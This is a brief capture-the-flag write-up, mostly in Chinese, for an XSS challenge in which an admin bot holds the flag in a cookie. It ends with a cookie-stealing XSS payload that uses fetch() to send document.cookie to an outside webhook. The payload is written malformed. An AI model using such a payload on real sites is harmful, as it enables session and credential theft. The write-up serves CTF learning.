constants.py

FLAG=os.getenv('FLAG',r'grey{fake_flag}')

COOKIE={"flag":FLAG}

flag在cookie里边，想到cookie外带。

adminbot中from constants import COOKIE  

driver.get(f'{baseUrl}/')

cookie={"name":"flag","value":COOKIE["flag"]}

driver.add_cookie(cookie)

driver.get(link)

print(f"Visited{link}")

server.py访问了adminbot的visit

很明显了，利用xss外带cookie

利用webhook进行接受，可能会有点慢，等个几分钟。

<scriptsrc="fetch(`https://webhook...../?cookie=${document.cookie}`)"></script>